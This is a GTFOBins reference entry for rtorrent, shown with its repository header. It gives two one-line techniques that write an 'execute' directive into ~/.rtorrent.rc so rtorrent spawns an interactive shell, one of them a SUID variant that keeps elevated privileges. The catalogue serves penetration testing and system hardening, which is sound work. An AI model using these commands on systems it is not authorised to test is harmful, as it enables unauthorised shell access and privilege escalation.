GTFOBins.github.io/_gtfobins/rtorrent.md
2022-12-16 13:16:06 +01:00

12 lines
284 B
Markdown

---
functions:
shell:
- code: |
echo "execute = /bin/sh,-c,\"/bin/sh <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
rtorrent
suid:
- code: |
echo "execute = /bin/sh,-p,-c,\"/bin/sh -p <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
./rtorrent
---